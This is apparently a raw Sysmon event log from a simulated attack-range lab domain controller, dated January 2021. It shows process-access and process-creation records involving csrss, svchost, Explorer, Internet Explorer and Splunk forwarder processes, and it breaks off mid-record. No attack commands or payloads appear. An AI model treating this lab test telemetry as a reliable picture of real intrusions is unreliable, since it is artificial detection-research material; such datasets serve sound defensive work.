13:31:07.764{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-479B-6000-3B05-000000009A01}5220C:\Windows\SysWOW64\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013133Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:07.764{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-479B-6000-3B05-000000009A01}5220C:\Windows\SysWOW64\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000013132Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:07.764{08A6967A-479B-6000-3B05-000000009A01}5220C:\Windows\SysWOW64\dllhost.exe10.0.14393.0 (rs1_release.160715-1616)COM SurrogateMicrosoft® Windows® Operating SystemMicrosoft Corporationdllhost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}C:\Windows\system32\ATTACKRANGE\Administrator{08A6967A-4752-6000-9133-2D0000000000}0x2d33912HighMD5=6046950FC9CA5B7A7E084C189658DACB,SHA256=5137C324038AB2E8EAB4F98A20BEE9F121346D62E4D907CA1E4A860F4C54EAE8,IMPHASH=EC90A0D780E0DD23BA7910ABD6BF7E32{08A6967A-4287-6000-0C00-000000009A01}588C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x800000000000000013144Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:12.342{08A6967A-4753-6000-0D05-000000009A01}11165952C:\Windows\System32\RuntimeBroker.exe{08A6967A-4753-6000-0F05-000000009A01}1084C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\TokenBroker.dll+1acfa|C:\Windows\System32\TokenBroker.dll+1d475|C:\Windows\System32\TokenBroker.dll+1d7f9|C:\Windows\System32\TokenBroker.dll+1e8f3|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+5086c|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce 10341000x800000000000000013143Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:12.342{08A6967A-4753-6000-0D05-000000009A01}11165952C:\Windows\System32\RuntimeBroker.exe{08A6967A-4753-6000-0F05-000000009A01}1084C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\TokenBroker.dll+21886|C:\Windows\System32\TokenBroker.dll+1ac23|C:\Windows\System32\TokenBroker.dll+1d475|C:\Windows\System32\TokenBroker.dll+1d7f9|C:\Windows\System32\TokenBroker.dll+1e8f3|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+5086c|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000013150Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:14.654{08A6967A-4754-6000-1705-000000009A01}34082820C:\Windows\Explorer.EXE{08A6967A-4781-6000-3A05-000000009A01}6928C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+50e44|C:\Windows\System32\SHELL32.dll+51f47|C:\Windows\Explorer.EXE+3ada8|C:\Windows\Explorer.EXE+3ac34|C:\Windows\Explorer.EXE+3aba1|C:\Windows\System32\windows.storage.dll+f51c7|C:\Windows\System32\windows.storage.dll+f3f4f|C:\Windows\System32\windows.storage.dll+f246f|C:\Windows\System32\SHCORE.dll+328c6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013149Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:14.639{08A6967A-4754-6000-1705-000000009A01}34085132C:\Windows\Explorer.EXE{08A6967A-4781-6000-3A05-000000009A01}6928C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+50e44|C:\Windows\System32\SHELL32.dll+51970|C:\Windows\System32\TwinUI.dll+144fa1|C:\Windows\System32\TwinUI.dll+14580f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013148Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:14.639{08A6967A-4754-6000-1705-000000009A01}34085132C:\Windows\Explorer.EXE{08A6967A-4781-6000-3A05-000000009A01}6928C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+144dd9|C:\Windows\System32\TwinUI.dll+14580f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013147Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:14.623{08A6967A-4754-6000-1705-000000009A01}34085404C:\Windows\Explorer.EXE{08A6967A-4781-6000-3A05-000000009A01}6928C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+50e44|C:\Windows\System32\SHELL32.dll+51f47|C:\Windows\Explorer.EXE+2fd1a|C:\Windows\Explorer.EXE+2ff29|C:\Windows\Explorer.EXE+2fc59|C:\Windows\Explorer.EXE+3ab97|C:\Windows\System32\windows.storage.dll+f51c7|C:\Windows\System32\windows.storage.dll+f3f4f|C:\Windows\System32\windows.storage.dll+f246f|C:\Windows\System32\SHCORE.dll+328c6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013146Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:14.623{08A6967A-4754-6000-1705-000000009A01}34085404C:\Windows\Explorer.EXE{08A6967A-4781-6000-3A05-000000009A01}6928C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+3007c|C:\Windows\Explorer.EXE+30028|C:\Windows\Explorer.EXE+2fccc|C:\Windows\Explorer.EXE+2ff29|C:\Windows\Explorer.EXE+2fc59|C:\Windows\Explorer.EXE+3ab97|C:\Windows\System32\windows.storage.dll+f51c7|C:\Windows\System32\windows.storage.dll+f3f4f|C:\Windows\System32\windows.storage.dll+f246f|C:\Windows\System32\SHCORE.dll+328c6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013145Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:14.623{08A6967A-4781-6000-3A05-000000009A01}69287028C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{08A6967A-4780-6000-3905-000000009A01}6868C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1baa08(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1ba9bf(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1ba966(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+3a8abf(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+1b324e(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+1b319b(wow64)|C:\Program Files (x86)\Internet Explorer\IEShims.dll+3fc44(wow64)|C:\Windows\system32\wininetlui.dll+1cf4(wow64)|C:\Windows\system32\wininetlui.dll+1a52(wow64)|C:\Windows\SYSTEM32\WININET.dll+2f6011(wow64)|C:\Windows\SYSTEM32\WININET.dll+2f6c20(wow64)|C:\Windows\SYSTEM32\urlmon.dll+eb4d3(wow64)|C:\Windows\SYSTEM32\urlmon.dll+eb239(wow64)|C:\Windows\SYSTEM32\urlmon.dll+381a1(wow64) 10341000x800000000000000013166Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:15.904{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-47A3-6000-3D05-000000009A01}5368C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013165Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:15.904{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013164Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:15.904{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013163Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:15.904{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013162Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:15.904{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013161Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:15.904{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-47A3-6000-3D05-000000009A01}5368C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013160Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:15.904{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-47A3-6000-3D05-000000009A01}5368C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000013159Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:15.905{08A6967A-47A3-6000-3D05-000000009A01}5368C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000013158Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:15.232{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-47A3-6000-3C05-000000009A01}5200C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013157Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:15.232{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013156Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:15.232{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013155Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:15.232{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013154Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:15.232{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013153Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:15.232{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-47A3-6000-3C05-000000009A01}5200C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013152Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:15.232{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-47A3-6000-3C05-000000009A01}5200C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000013151Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:15.233{08A6967A-47A3-6000-3C05-000000009A01}5200C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000013181Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:16.623{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-47A4-6000-3E05-000000009A01}6300C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013180Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 